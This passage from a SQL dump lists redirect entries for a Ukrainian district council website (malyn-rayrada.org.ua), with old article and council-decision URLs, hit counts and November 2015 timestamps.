00:00:00',301),(16828,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2015-11-02 12:37:00','0000-00-00 00:00:00',301),(16829,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-11-02 12:37:02','0000-00-00 00:00:00',301),(16830,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-02 12:37:04','0000-00-00 00:00:00',301),(16831,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=uk','','','',5,0,'2015-11-02 12:37:05','0000-00-00 00:00:00',301),(16832,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=uk','','','',5,0,'2015-11-02 12:37:10','0000-00-00 00:00:00',301),(16833,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:37:19','0000-00-00 00:00:00',301),(16834,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11&lang=uk','','','',7,0,'2015-11-02 12:37:25','0000-00-00 00:00:00',301),(16835,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11&lang=en','','','',5,0,'2015-11-02 12:37:26','0000-00-00 00:00:00',301),(16836,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11&lang=ru','','','',5,0,'2015-11-02 12:37:28','0000-00-00 00:00:00',301),(16837,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11&lang=uk','','','',17,0,'2015-11-02 12:37:29','0000-00-00 00:00:00',301),(16838,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=en','','','',5,0,'2015-11-02 12:38:04','0000-00-00 00:00:00',301),(16839,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=ru','','','',5,0,'2015-11-02 12:38:06','0000-00-00 00:00:00',301),(16840,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=uk','','','',5,0,'2015-11-02 12:38:08','0000-00-00 00:00:00',301),(16841,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=en','','','',5,0,'2015-11-02 12:38:09','0000-00-00 00:00:00',301),(16842,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=ru','','','',5,0,'2015-11-02 12:38:11','0000-00-00 00:00:00',301),(16843,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=uk','','','',5,0,'2015-11-02 12:38:12','0000-00-00 00:00:00',301),(16844,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15&lang=en','','','',5,0,'2015-11-02 12:38:22','0000-00-00 00:00:00',301),(16845,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15&lang=ru','','','',5,0,'2015-11-02 12:38:28','0000-00-00 00:00:00',301),(16846,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15&lang=uk','','','',5,0,'2015-11-02 12:38:31','0000-00-00 00:00:00',301),(16847,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=en','','','',5,0,'2015-11-02 12:38:34','0000-00-00 00:00:00',301),(16848,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=ru','','','',5,0,'2015-11-02 12:38:37','0000-00-00 00:00:00',301),(16849,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=uk','','','',7,0,'2015-11-02 12:38:42','0000-00-00 00:00:00',301),(16850,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15&lang=en','','','',5,0,'2015-11-02 12:38:45','0000-00-00 00:00:00',301),(16851,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15&lang=ru','','','',5,0,'2015-11-02 12:38:47','0000-00-00 00:00:00',301),(16852,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15&lang=uk','','','',5,0,'2015-11-02 12:38:55','0000-00-00 00:00:00',301),(16853,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=en','','','',5,0,'2015-11-02 12:38:56','0000-00-00 00:00:00',301),(16854,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=ru','','','',5,0,'2015-11-02 12:38:58','0000-00-00 00:00:00',301),(16855,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=uk','','','',5,0,'2015-11-02 12:39:00','0000-00-00 00:00:00',301),(16856,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=en','','','',5,0,'2015-11-02 12:39:02','0000-00-00 00:00:00',301),(16857,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=ru','','','',5,0,'2015-11-02 12:39:03','0000-00-00 00:00:00',301),(16858,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=uk','','','',5,0,'2015-11-02 12:39:05','0000-00-00 00:00:00',301),(16859,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=uk','','','',5,0,'2015-11-02 12:39:06','0000-00-00 00:00:00',301),(16860,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=uk','','','',9,0,'2015-11-02 12:39:10','0000-00-00 00:00:00',301),(16861,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=ru','','','',5,0,'2015-11-02 12:39:12','0000-00-00 00:00:00',301),(16862,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=uk','','','',5,0,'2015-11-02 12:39:19','0000-00-00 00:00:00',301),(16863,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=en','','','',5,0,'2015-11-02 12:39:29','0000-00-00 00:00:00',301),(16864,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=ru','','','',5,0,'2015-11-02 12:39:30','0000-00-00 00:00:00',301),(16865,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=uk','','','',5,0,'2015-11-02 12:39:31','0000-00-00 00:00:00',301),(16866,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=uk','','','',5,0,'2015-11-02 12:39:51','0000-00-00 00:00:00',301),(16867,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku','','','',12,0,'2015-11-02 13:31:42','0000-00-00 00:00:00',301),(16868,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=52&Itemid=93&lang=uk','','','',10,0,'2015-11-02 14:00:42','0000-00-00 00:00:00',301),(16869,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/443-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_6','','','',8,0,'2015-11-02 14:00:43','0000-00-00 00:00:00',301),(16870,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-','','','',10,0,'2015-11-02 14:00:43','0000-00-00 00:00:00',301),(16871,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/316-pro-zatverdzhennja-rajonnoi-programi_2','','','',12,0,'2015-11-02 14:00:46','0000-00-00 00:00:00',301),(16872,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-','','','',11,0,'2015-11-02 14:00:49','0000-00-00 00:00:00',301),(16873,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?start=28','','https://www.google.com.ua/','',19,0,'2015-11-02 14:04:04','0000-00-00 00:00:00',301),(16874,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=913:-l-28r-&lang=ru&option=com_content&view=article','','','',4,0,'2015-11-02 14:07:07','0000-00-00 00:00:00',301),(16875,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-','','','',13,0,'2015-11-02 14:07:58','0000-00-00 00:00:00',301),(16876,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/880-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',8,0,'2015-11-02 14:08:03','0000-00-00 00:00:00',301),(16878,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-','','','',7,0,'2015-11-02 14:08:05','0000-00-00 00:00:00',301),(16879,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011','','','',15,0,'2015-11-02 14:08:06','0000-00-00 00:00:00',301),(16880,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-','','','',13,0,'2015-11-02 14:47:19','0000-00-00 00:00:00',301),(16881,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/666-pro-zvernennja-shhodo-zabezpechennja-socialnih','','','',7,0,'2015-11-02 14:47:20','0000-00-00 00:00:00',301),(16882,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/996-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',8,0,'2015-11-02 14:47:25','0000-00-00 00:00:00',301),(16883,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-','','','',12,0,'2015-11-02 14:47:30','0000-00-00 00:00:00',301),(16884,'http://www.malyn-rayrada.org.ua/index.php?Itemid=69&catid=35&id=359:2011-06-30-11-10-42&lang=uk&option=com_content&view=article','','','',5,0,'2015-11-02 17:06:45','0000-00-00 00:00:00',301),(16885,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=545:2012-01-26-12-06-01&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-02 17:06:48','0000-00-00 00:00:00',301),(16886,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho','','','',4,0,'2015-11-02 17:38:24','0000-00-00 00:00:00',301),(16887,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11&lang=en','','','',4,0,'2015-11-02 18:05:29','0000-00-00 00:00:00',301),(16888,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11&lang=ru','','','',4,0,'2015-11-02 18:05:34','0000-00-00 00:00:00',301),(16890,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1024-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',22,0,'2015-11-02 19:42:49','0000-00-00 00:00:00',301),(16891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-11-02 19:43:13','0000-00-00 00:00:00',301),(16892,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=350:-----l---28r----&catid=34:--15062011-&Itemid=68&lang=en','','','',12,0,'2015-11-02 19:44:05','0000-00-00 00:00:00',301),(16893,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1010-pro-zatverdzhennya-zvitu-pro-vikonannya-rajonnogo-byudzhetu-za-2014-rik','','','',14,0,'2015-11-02 19:44:41','0000-00-00 00:00:00',301),(16894,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/150-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi','','','',21,0,'2015-11-02 19:45:17','0000-00-00 00:00:00',301),(16895,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1164-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',30,0,'2015-11-02 19:46:09','0000-00-00 00:00:00',301),(16896,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1089-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',29,0,'2015-11-02 19:46:18','0000-00-00 00:00:00',301),(16897,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7:2010-06-05-12-53-35&Itemid=12&lang=ru','','','',8,0,'2015-11-02 19:46:36','0000-00-00 00:00:00',301),(16898,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/611-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_21','','','',15,0,'2015-11-02 19:47:51','0000-00-00 00:00:00',301),(16899,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=605:-l-r-i-iii-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2015-11-02 19:48:03','0000-00-00 00:00:00',301),(16900,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1090-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',30,0,'2015-11-02 19:50:05','0000-00-00 00:00:00',301),(16901,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=315:2011-05-20-13-07-47&catid=33&Itemid=66&lang=ru','','','',1,0,'2015-11-02 19:51:59','0000-00-00 00:00:00',301),(16902,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=32&Itemid=64&lang=uk','','','',59,0,'2015-11-02 19:52:24','0000-00-00 00:00:00',301),(16903,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=597:-l-r-2011-&catid=40:--28032012-&Itemid=77&lang=en','','','',1,0,'2015-11-02 19:54:48','0000-00-00 00:00:00',301),(16904,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/908-pro-prisvoennya-chergovogo-rangu-posadovoji-osobi-mistsevogo-samovryaduvannya-golovi-rajonnoji-radi','','','',33,0,'2015-11-02 19:56:04','0000-00-00 00:00:00',301),(16905,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/431-pro-zatverdzhennja-porjadku-i-normativiv_2','','','',80,0,'2015-11-02 19:59:17','0000-00-00 00:00:00',301),(16906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=55&Itemid=96&lang=en','','','',12,0,'2015-11-02 20:03:44','0000-00-00 00:00:00',301),(16907,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1070-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-ukrajinkivskoji-silskoji-radi','','','',48,0,'2015-11-02 20:05:32','0000-00-00 00:00:00',301),(16908,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=30&Itemid=61&lang=uk','','','',5,0,'2015-11-02 20:24:43','0000-00-00 00:00:00',301),(16909,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/651-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_22','','','',14,0,'2015-11-02 20:39:41','0000-00-00 00:00:00',301),(16910,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=880:2012-12-21-17-03-54&Itemid=85&lang=ru&option=com_content&view=article','','','',5,0,'2015-11-02 20:43:02','0000-00-00 00:00:00',301),(16911,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/95-pro-hid-vikonannja-rajonnoi-socialnoi-programi','','','',11,0,'2015-11-02 20:44:58','0000-00-00 00:00:00',301),(16912,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=54&Itemid=95&lang=en','','','',7,0,'2015-11-02 21:04:49','0000-00-00 00:00:00',301),(16913,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2015-11-02 21:07:46','0000-00-00 00:00:00',301),(16914,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1069-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-chopovitskoji-selishchnoji-radi','','','',44,0,'2015-11-02 21:16:56','0000-00-00 00:00:00',301),(16915,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=349:--------20--2011--108-l---r&Itemid=68&lang=ru&option=com_content&view=article','','','',4,0,'2015-11-02 21:19:14','0000-00-00 00:00:00',301),(16916,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/739-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_5','','','',77,0,'2015-11-02 21:20:30','0000-00-00 00:00:00',301),(16917,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/607-pro-nadannja-dozvolu-na-rozroblennja-detalnogo_2','','','',19,0,'2015-11-02 21:22:25','0000-00-00 00:00:00',301),(16918,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1111-pro-informatsiyu-prokuraturi-malinskogo-rajonu-pro-stan-zakonnosti-zakhodi-shchodo-jiji-zmitsnennya-ta-rezultati-diyalnosti-na-teritoriji-rajonu','','','',53,0,'2015-11-02 21:24:40','0000-00-00 00:00:00',301),(16919,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/246-pro-zminu-nazvi-navchalnih-zakladiv-rajonu_2','','','',19,0,'2015-11-02 21:35:24','0000-00-00 00:00:00',301),(16920,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/111-pro-plan-roboti-rajonnoi-radi-na-i-pivrichchja','','','',14,0,'2015-11-02 21:38:10','0000-00-00 00:00:00',301),(16921,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=330:2011-05-20-16-28-08&catid=33:-20052011&Itemid=66&lang=en','','','',1,0,'2015-11-02 21:40:53','0000-00-00 00:00:00',301),(16922,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/248-pro-nadannja-pilgi-z-orendnoi-plati-upravlinnju','','','',15,0,'2015-11-02 21:55:00','0000-00-00 00:00:00',301),(16923,'http://www.malyn-rayrada.org.ua/index.php/--15042014-/773-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014','','','',3,0,'2015-11-02 21:57:58','0000-00-00 00:00:00',301),(16924,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/130-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_4','','','',14,0,'2015-11-02 21:58:12','0000-00-00 00:00:00',301),(16925,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/135-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja_2','','','',12,0,'2015-11-02 21:58:16','0000-00-00 00:00:00',301),(16926,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/140-pro-hid-vikonannja-rajonnoi-cilovoi-programi','','','',10,0,'2015-11-02 21:58:49','0000-00-00 00:00:00',301),(16927,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/350-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_5','','','',8,0,'2015-11-02 21:58:55','0000-00-00 00:00:00',301),(16928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7:2010-06-05-12-53-35&Itemid=12&lang=en','','','',1,0,'2015-11-02 21:59:53','0000-00-00 00:00:00',301),(16929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=546:-l-r-&catid=39&Itemid=76&lang=en','','','',2,0,'2015-11-02 22:01:28','0000-00-00 00:00:00',301),(16930,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=682:-2012-&Itemid=80&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-02 22:01:51','0000-00-00 00:00:00',301),(16931,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=274:2011-03-28-08-22-32&catid=31:-25032011&Itemid=62&lang=en','','','',42,0,'2015-11-02 22:02:09','0000-00-00 00:00:00',301),(16932,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/157-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_3','','','',22,0,'2015-11-02 22:02:13','0000-00-00 00:00:00',301),(16934,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/736-pro-zatverdzhennja-polozhennja-pro-konkursnij_2','','','',19,0,'2015-11-02 22:02:29','0000-00-00 00:00:00',301),(16935,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/541-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_12','','','',22,0,'2015-11-02 22:04:16','0000-00-00 00:00:00',301),(16936,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/968-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',15,0,'2015-11-02 22:04:48','0000-00-00 00:00:00',301),(16937,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/961-pro-prijnyattya-u-spilnu-vlasnist-teritorialnikh-gromad-sil-selishch-rajonu-majna','','','',39,0,'2015-11-02 22:04:53','0000-00-00 00:00:00',301),(16938,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/982-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2015-rik','','','',2,0,'2015-11-02 22:04:56','0000-00-00 00:00:00',301),(16939,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1088-pro-zvernennya-do-prem-er-ministra-ukrajini-shchodo-nadannya-praktichnoji-dopomogi-v-pitanni-rozblokuvannya-rakhunkiv-upravlinnya-pratsi-ta-sotsialnogo-z','','','',1,0,'2015-11-02 22:05:12','0000-00-00 00:00:00',301),(16940,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-','','','',26,0,'2015-11-02 22:05:28','0000-00-00 00:00:00',301),(16941,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=7','','','',4,0,'2015-11-02 22:06:18','0000-00-00 00:00:00',301),(16942,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/162-pro-nadannja-zgodi-na-prijnjattja-u-spilnu','','','',20,0,'2015-11-02 22:06:56','0000-00-00 00:00:00',301),(16943,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/369-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi','','','',13,0,'2015-11-02 22:06:59','0000-00-00 00:00:00',301),(16944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-11-02 22:07:16','0000-00-00 00:00:00',301),(16945,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012?limitstart=0','','','',1,0,'2015-11-02 22:07:29','0000-00-00 00:00:00',301),(16946,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/132-perelik-rishen-prijnjatih-na-5-sesii-rajonnoi-radi','','','',13,0,'2015-11-02 22:07:34','0000-00-00 00:00:00',301),(16947,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-?start=7','','','',12,0,'2015-11-02 22:07:45','0000-00-00 00:00:00',301),(16948,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/865-pro-vnesennya-zmin-do-pereliku-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu','','','',18,0,'2015-11-02 22:07:48','0000-00-00 00:00:00',301),(16950,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/91-pro-zatverdzhennja-polozhennja-pro-pochesnu','','','',16,0,'2015-11-02 22:08:33','0000-00-00 00:00:00',301),(16951,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/859-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',55,0,'2015-11-02 22:09:02','0000-00-00 00:00:00',301),(16952,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/737-pro-zatverdzhennja-programi-polipshennja-stanu','','','',24,0,'2015-11-02 22:09:09','0000-00-00 00:00:00',301),(16953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=uk&limitstart=5','','','',3,0,'2015-11-02 22:13:10','0000-00-00 00:00:00',301),(16954,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/74-pro-prisvoennja-golovi-rajonnoi-radi-rangu','','','',17,0,'2015-11-02 22:21:34','0000-00-00 00:00:00',301),(16955,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=54&Itemid=95&lang=ru','','','',6,0,'2015-11-02 22:28:54','0000-00-00 00:00:00',301),(16956,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?start=21','','','',9,0,'2015-11-02 22:29:56','0000-00-00 00:00:00',301),(16957,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/113-pro-rajonnu-programu-individualnogo-zhitlovogo','','','',9,0,'2015-11-02 22:31:31','0000-00-00 00:00:00',301),(16958,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/87-pro-vnesennja-zmin-do-programi-pidtrimki-malogo','','','',14,0,'2015-11-02 22:32:10','0000-00-00 00:00:00',301),(16959,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/208-pro-zatverdzhennja-polozhennja-pro-orendu-majna','','','',11,0,'2015-11-02 22:32:31','0000-00-00 00:00:00',301),(16960,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-?start=14','','','',5,0,'2015-11-02 22:32:33','0000-00-00 00:00:00',301),(16961,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/429-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_17','','','',18,0,'2015-11-02 22:32:39','0000-00-00 00:00:00',301),(16962,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=uk&limitstart=5','','','',1,0,'2015-11-02 22:43:31','0000-00-00 00:00:00',301),(16963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=543:2012-01-26-11-58-53&catid=39&Itemid=76&lang=ru','','','',10,0,'2015-11-02 22:46:59','0000-00-00 00:00:00',301),(16965,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=997:-27-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',2,0,'2015-11-02 23:19:28','0000-00-00 00:00:00',301),(16966,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=en','','','',4,0,'2015-11-03 00:12:10','0000-00-00 00:00:00',301),(16967,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/459-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_19','','','',15,0,'2015-11-03 00:12:56','0000-00-00 00:00:00',301),(16969,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/284-pro-vikoristannja-koshtiv-shho-nadijshli-u','','','',10,0,'2015-11-03 01:18:30','0000-00-00 00:00:00',301),(16970,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/363-pro-vnesennja-zmin-do-programi-zajnjatosti','','','',19,0,'2015-11-03 01:20:01','0000-00-00 00:00:00',301),(16971,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2','','','',3,0,'2015-11-03 04:43:59','0000-00-00 00:00:00',301),(16972,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2015-11-03 05:01:33','0000-00-00 